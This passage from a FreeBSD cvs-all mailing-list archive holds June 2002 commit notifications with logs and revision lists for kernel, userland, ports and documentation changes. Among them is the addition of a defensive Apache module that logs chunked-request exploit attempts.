-W/-F, nice(1) -n, pam_echo(8), pam_exec(8), pselect(3), wc(1) -m, USD/PSD documents restored. Revision Changes Path 1.374 +108 -1 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:54:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1682D37B400; Sat, 22 Jun 2002 14:54:34 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLsY247995; Sat, 22 Jun 2002 14:54:34 -0700 (PDT) (envelope-from bmah) Message-Id: <200206222154.g5MLsY247995@freefall.freebsd.org> From: "Bruce A. Mah" Date: Sat, 22 Jun 2002 14:54:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/22 14:54:34 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: MFC: rp(4) update, nice(1) -n. Revision Changes Path 1.22.2.255 +7 -2 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15: 1:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3808637B400; Sat, 22 Jun 2002 15:01:14 -0700 (PDT) Received: (from mckusick@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MM1Eb49113; Sat, 22 Jun 2002 15:01:14 -0700 (PDT) (envelope-from mckusick) Message-Id: <200206222201.g5MM1Eb49113@freefall.freebsd.org> From: Kirk McKusick Date: Sat, 22 Jun 2002 15:01:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys stat.h src/sys/kern vfs_syscalls.c vfs_vnops.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mckusick 2002/06/22 15:01:14 PDT Modified files: sys/sys stat.h sys/kern vfs_syscalls.c vfs_vnops.c Log: This patch fixes a size problem with the stat structure for 64-bit architectures that was introduced in the UFS2 code merge two days ago. The stat structure change that caused the problem was the addition of the file create time. Submitted by: Bruce Evans Sponsored by: DARPA & NAI Labs. Revision Changes Path 1.262 +1 -1 src/sys/kern/vfs_syscalls.c 1.148 +1 -2 src/sys/kern/vfs_vnops.c 1.26 +22 -12 src/sys/sys/stat.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:11:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EEEF637B401; Sat, 22 Jun 2002 15:11:34 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMBYw54613; Sat, 22 Jun 2002 15:11:34 -0700 (PDT) (envelope-from gad) Message-Id: <200206222211.g5MMBYw54613@freefall.freebsd.org> From: Garance A Drosehn Date: Sat, 22 Jun 2002 15:11:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/common_source common.c lp.h src/usr.sbin/lpr/lpc cmds.c cmdtab.c extern.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/22 15:11:34 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/common_source common.c lp.h usr.sbin/lpr/lpc cmds.c cmdtab.c extern.h Log: MFC *: Almost complete rewrite of the lpc commands 'abort', 'enable', 'disable', 'restart', 'start', 'stop' and 'up'. This reduces the amount of code that is run as the priv userid, and eliminates some cases where error messages were written while that priv uid was in effect. As far as users are concerned, there should be no noticable difference in the new versions. In case there *is*, the previous implementations are still there as 'xabort', 'xenable', etc, so they are available for instant fallback. If no one reports a problem after a few weeks, then a later update will remove those x-commands. [* = 1.26->1.28 common.c, 1.21 lp.h, 1.25 cmds.c, 1.5 cmdtab.c, 1.6 extern.h] Revision Changes Path 1.12.2.14 +133 -0 src/usr.sbin/lpr/common_source/common.c 1.9.2.10 +18 -0 src/usr.sbin/lpr/common_source/lp.h 1.14.2.10 +278 -0 src/usr.sbin/lpr/lpc/cmds.c 1.3.2.2 +15 -8 src/usr.sbin/lpr/lpc/cmdtab.c 1.3.6.3 +15 -8 src/usr.sbin/lpr/lpc/extern.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:23: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ED3B637B400; Sat, 22 Jun 2002 15:23:01 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMN1l56163; Sat, 22 Jun 2002 15:23:01 -0700 (PDT) (envelope-from bmah) Message-Id: <200206222223.g5MMN1l56163@freefall.freebsd.org> From: "Bruce A. Mah" Date: Sat, 22 Jun 2002 15:23:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/22 15:23:01 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: Add a reference to the "make world" section of the Handbook. PR: 39460 Submitted by: nik Revision Changes Path 1.375 +7 -2 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:24:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5537F37B401; Sat, 22 Jun 2002 15:24:08 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMO8L56366; Sat, 22 Jun 2002 15:24:08 -0700 (PDT) (envelope-from bmah) Message-Id: <200206222224.g5MMO8L56366@freefall.freebsd.org> From: "Bruce A. Mah" Date: Sat, 22 Jun 2002 15:24:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/22 15:24:08 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: MFC: Add cross-reference to the "make world" section of the Handbook. Revision Changes Path 1.22.2.256 +7 -2 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:24:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1148C37B401; Sat, 22 Jun 2002 15:24:47 -0700 (PDT) Received: (from mbr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMOlB56498; Sat, 22 Jun 2002 15:24:47 -0700 (PDT) (envelope-from mbr) Message-Id: <200206222224.g5MMOlB56498@freefall.freebsd.org> From: Martin Blapp Date: Sat, 22 Jun 2002 15:24:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors/openoffice Makefile ports/editors/openoffice-devel Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mbr 2002/06/22 15:24:46 PDT Modified files: editors/openoffice Makefile editors/openoffice-devel Makefile Log: Assign maintainer to mailinglist. Revision Changes Path 1.50 +1 -1 ports/editors/openoffice-devel/Makefile 1.83 +1 -1 ports/editors/openoffice/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:35:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E99E637B403; Sat, 22 Jun 2002 15:35:53 -0700 (PDT) Received: (from jdp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMZrd58098; Sat, 22 Jun 2002 15:35:53 -0700 (PDT) (envelope-from jdp) Message-Id: <200206222235.g5MMZrd58098@freefall.freebsd.org> From: John Polstra Date: Sat, 22 Jun 2002 15:35:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/i386 in_cksum.c src/sys/i386/include in_cksum.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jdp 2002/06/22 15:35:53 PDT Modified files: sys/i386/i386 in_cksum.c sys/i386/include in_cksum.h Log: Fix several bugs in the i386 asm statements used to speed up Internet checksumming. These bugs could possibly cause bad code to be generated at elevated optimization levels. First, eliminate the use of preprocessor magic to form the address fields of asm instructions. It hid the actual addresses being referenced from the compiler. Without knowledge of all the data dependencies, the compiler might possibly use optimizations which would result in incorrect code. Use "__asm __volatile" rather than "__asm" for instruction sequences that pass information through the condition codes (the carry bit, in this case). Without __volatile, the compiler might add unrelated code between consecutive __asm instructions, modifying the condition codes. I have seen GCC insert stack pointer adjustments in this way, for example. Unfortunately, GCC doesn't provide a way to specify dependencies on the condition codes. You can specify that they are clobbered, but not that you are going to use them as input. Finally, simplify the LOAD macro. This macro is used as a poor man's prefetch. The simpler version gives the compiler more leeway about just how it performs the prefetch. MFC after: 1 week Revision Changes Path 1.24 +13 -6 src/sys/i386/i386/in_cksum.c 1.13 +14 -11 src/sys/i386/include/in_cksum.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:44:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C973137B405; Sat, 22 Jun 2002 15:44:09 -0700 (PDT) Received: (from mckusick@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMi9s59394; Sat, 22 Jun 2002 15:44:09 -0700 (PDT) (envelope-from mckusick) Message-Id: <200206222244.g5MMi9s59394@freefall.freebsd.org> From: Kirk McKusick Date: Sat, 22 Jun 2002 15:44:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sbin/newfs mkfs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mckusick 2002/06/22 15:44:09 PDT Modified files: sbin/newfs mkfs.c Log: Get rid of paranoia that zeros the boot block area as this has bad effect on existing bootstraps. Submitted by: Jake Burkholder Sponsored by: DARPA & NAI Labs. Revision Changes Path 1.58 +0 -7 src/sbin/newfs/mkfs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:50:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A0C7737B401; Sat, 22 Jun 2002 15:50:34 -0700 (PDT) Received: (from anders@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MMoYU60380; Sat, 22 Jun 2002 15:50:34 -0700 (PDT) (envelope-from anders) Message-Id: <200206222250.g5MMoYU60380@freefall.freebsd.org> From: Anders Nordby Date: Sat, 22 Jun 2002 15:50:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www Makefile ports/www/mod_blowchunks Makefile distinfo pkg-comment pkg-descr pkg-plist ports/www/mod_blowchunks/files patch-mod_blowchunks-1.3.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG anders 2002/06/22 15:50:34 PDT Modified files: www Makefile Added files: www/mod_blowchunks Makefile distinfo pkg-comment pkg-descr pkg-plist www/mod_blowchunks/files patch-mod_blowchunks-1.3.c Log: Add mod_blowchunks, an Apache module to reject and log chunked requests. Useful for those that want to log attempts to exploit that recent Apache vulnerability, or who need or want to use their current Apache version for some reason. Revision Changes Path 1.510 +1 -0 ports/www/Makefile 1.1 +48 -0 ports/www/mod_blowchunks/Makefile (new) 1.1 +1 -0 ports/www/mod_blowchunks/distinfo (new) 1.1 +13 -0 ports/www/mod_blowchunks/files/patch-mod_blowchunks-1.3.c (new) 1.1 +1 -0 ports/www/mod_blowchunks/pkg-comment (new) 1.1 +8 -0 ports/www/mod_blowchunks/pkg-descr (new) 1.1 +3 -0 ports/www/mod_blowchunks/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 15:51: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 359D237B404; Sat, 22 Jun 2002 15:50:39 -0700 (PDT) Received: (from anders@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MModh60469; Sat, 22 Jun 2002 15:50:39 -0700 (PDT) (envelope-from anders) Message-Id: <200206222250.g5MModh60469@freefall.freebsd.org> From: Anders Nordby Date: Sat, 22 Jun 2002 15:50:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG anders 2002/06/22 15:50:39 PDT Modified files: . modules Log: mod_blowchunks --> ports/www/mod_blowchunks Revision Changes Path 1.5401 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 16: 0:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 81C9F37B435; Sat, 22 Jun 2002 16:00:33 -0700 (PDT) Received: (from mp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MN0Xw62214; Sat, 22 Jun 2002 16:00:33 -0700 (PDT) (envelope-from mp) Message-Id: <200206222300.g5MN0Xw62214@freefall.freebsd.org> From: Mark Peek Date: Sat, 22 Jun 2002 16:00:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/include specialreg.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mp 2002/06/22 16:00:33 PDT Modified files: sys/i386/include specialreg.h Log: Add additional cpuid feature flags and put into a canonical format. MFC after: 1 week Revision Changes Path 1.21 +34 -19 src/sys/i386/include/specialreg.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 16:55:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ED42837B403; Sat, 22 Jun 2002 16:55:17 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MNtHM73136; Sat, 22 Jun 2002 16:55:17 -0700 (PDT) (envelope-from jake) Message-Id: <200206222355.g5MNtHM73136@freefall.freebsd.org> From: Jake Burkholder Date: Sat, 22 Jun 2002 16:55:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sparc64/sparc64 pmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/22 16:55:16 PDT Modified files: sys/sparc64/sparc64 pmap.c Log: Fix a bug related to marking pages virtually uncacheable due to illegal dcache aliasing. A page that already had more than 1 mapping of the same virtual colour would not be correctly uncached. Noticed by: Artur Grabowski Revision Changes Path 1.61 +4 -4 src/sys/sparc64/sparc64/pmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 17:38: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A908D37B401; Sat, 22 Jun 2002 17:38:04 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N0c4a82445; Sat, 22 Jun 2002 17:38:04 -0700 (PDT) (envelope-from jake) Message-Id: <200206230038.g5N0c4a82445@freefall.freebsd.org> From: Jake Burkholder Date: Sat, 22 Jun 2002 17:38:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys ktr.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/22 17:38:04 PDT Modified files: sys/sys ktr.h Log: KTR_CT* had one too many trailing zeroes, making KTR_CT5-8 too large for ktr_mask. Revision Changes Path 1.18 +8 -8 src/sys/sys/ktr.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 17:55: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2128537B404; Sat, 22 Jun 2002 17:55:04 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N0t4684772; Sat, 22 Jun 2002 17:55:04 -0700 (PDT) (envelope-from obrien) Message-Id: <200206230055.g5N0t4684772@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 17:55:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/locate/locate mklocatedb.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 17:55:04 PDT Modified files: usr.bin/locate/locate mklocatedb.sh Log: Replace a perl usage with an AWK one. Submitted by: Bob Willcox Revision Changes Path 1.11 +2 -2 src/usr.bin/locate/locate/mklocatedb.sh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 17:57:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 66CE737B400; Sat, 22 Jun 2002 17:57:17 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N0vHU84999; Sat, 22 Jun 2002 17:57:17 -0700 (PDT) (envelope-from obrien) Message-Id: <200206230057.g5N0vHU84999@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 17:57:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/locate/locate mklocatedb.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 17:57:17 PDT Modified files: usr.bin/locate/locate mklocatedb.sh Log: Only got one of the Perl usages. Revision Changes Path 1.12 +3 -2 src/usr.bin/locate/locate/mklocatedb.sh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 18:32: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D89C237B401; Sat, 22 Jun 2002 18:32:00 -0700 (PDT) Received: (from grog@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N1W0n93627; Sat, 22 Jun 2002 18:32:00 -0700 (PDT) (envelope-from grog) Message-Id: <200206230132.g5N1W0n93627@freefall.freebsd.org> From: Greg Lehey Date: Sat, 22 Jun 2002 18:32:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sbin/vinum vinum.8 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG grog 2002/06/22 18:32:00 PDT Modified files: sbin/vinum vinum.8 Log: Correct default location of history file. Observed by: Chris Bolt Revision Changes Path 1.57 +1 -1 src/sbin/vinum/vinum.8 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 18:48:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1FB5237B404; Sat, 22 Jun 2002 18:48:23 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N1mN795443; Sat, 22 Jun 2002 18:48:23 -0700 (PDT) (envelope-from alc) Message-Id: <200206230148.g5N1mN795443@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 18:48:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_mmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 18:48:23 PDT Modified files: sys/vm vm_mmap.c Log: o Remove the unnecessary acquisition and release of Giant around fdrop() in mmap(2). Revision Changes Path 1.148 +3 -2 src/sys/vm/vm_mmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 18:51:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4DE1B37B400; Sat, 22 Jun 2002 18:51:24 -0700 (PDT) Received: (from chris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N1pOu96155; Sat, 22 Jun 2002 18:51:24 -0700 (PDT) (envelope-from chris) Message-Id: <200206230151.g5N1pOu96155@freefall.freebsd.org> From: Chris Costello Date: Sat, 22 Jun 2002 18:51:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/trustedbsd/www components.page sidebar.xml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG chris 2002/06/22 18:51:24 PDT Modified files: trustedbsd/www components.page sidebar.xml Log: o Remove sidebar entry for Developers; the information is duplicated at the top of developers.page and that's the best place for it. o Add anchors for the sidebar links to components.page o Add a link to the "Event Auditing" information to the Components section of the sidebar. Sponsored by: DARPA, NAI Labs Revision Changes Path 1.6 +6 -1 projects/trustedbsd/www/components.page 1.2 +1 -5 projects/trustedbsd/www/sidebar.xml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 18:55:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3751937B40B; Sat, 22 Jun 2002 18:55:16 -0700 (PDT) Received: (from imp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N1tG396625; Sat, 22 Jun 2002 18:55:16 -0700 (PDT) (envelope-from imp) Message-Id: <200206230155.g5N1tG396625@freefall.freebsd.org> From: Warner Losh Date: Sat, 22 Jun 2002 18:55:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pccard i82365.h pccard.c pcic.c pcic_pci.c pcic_pci.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG imp 2002/06/22 18:55:16 PDT Modified files: sys/pccard i82365.h pccard.c pcic.c pcic_pci.c pcic_pci.h Log: What: o ToPIC is happy with two cards now, even when the two cards are modems. o Fix (all?) hangs on boot when power is applied to the card. I suspect that this will make the Ricoh bridges happier and also make a lot of VAIO owners happy (confirm to me in private email please :-). o All Cardbus bridges should now support 3.3V, X.XV and Y.YV cards, to the extent that the underlying hardware supports such cards. (X.X and Y.Y haven't been assigned values yet :-). o Better 3.3V support for Ricoh ISA bridges. How: o Don't mess with the power register when scanning the cards. It is unnecessary and causes BADVcc conditions on many chipsets. These in turn can cause an interrupt storm. o Make pcic_disable reset the slot's voltage. o Move initializing voltage for the slot until after it has been disabled. o Fix a lot of issues with the pcic_cardbus_power routine. We now properly enable the card and take it out of reset after a power change. o When detecting the card's voltage, if we're in a BadVcc state, direct the bridge to rescan the card for what it supports. (we might need to in the future set the power register to 0 before doing this). o Don't preserve CLKSTOP. need to revisit this. o Better support for Ricoh ISA bridges for 3.3V cards. o Don't write to PCIC_POWER directly as offten, but instead go through the pcic_power interface. o All cardbus bridges now default to use cardbus power control. o Add misc register definitions. o remove some (now) bogus comments. Extra Special Thanks To: Scott Lamber for his kind and generous loan of a Toshiba laptop with a ToPIC 100 in it for my use. Revision Changes Path 1.24 +2 -1 src/sys/pccard/i82365.h 1.148 +7 -9 src/sys/pccard/pccard.c 1.173 +77 -15 src/sys/pccard/pcic.c 1.112 +51 -49 src/sys/pccard/pcic_pci.c 1.34 +17 -0 src/sys/pccard/pcic_pci.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 20:10:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ABA0437B405; Sat, 22 Jun 2002 20:10:19 -0700 (PDT) Received: (from keramida@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N3AJd16066; Sat, 22 Jun 2002 20:10:19 -0700 (PDT) (envelope-from keramida) Message-Id: <200206230310.g5N3AJd16066@freefall.freebsd.org> From: Giorgos Keramidas Date: Sat, 22 Jun 2002 20:10:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/contrib Makefile chapter.sgml 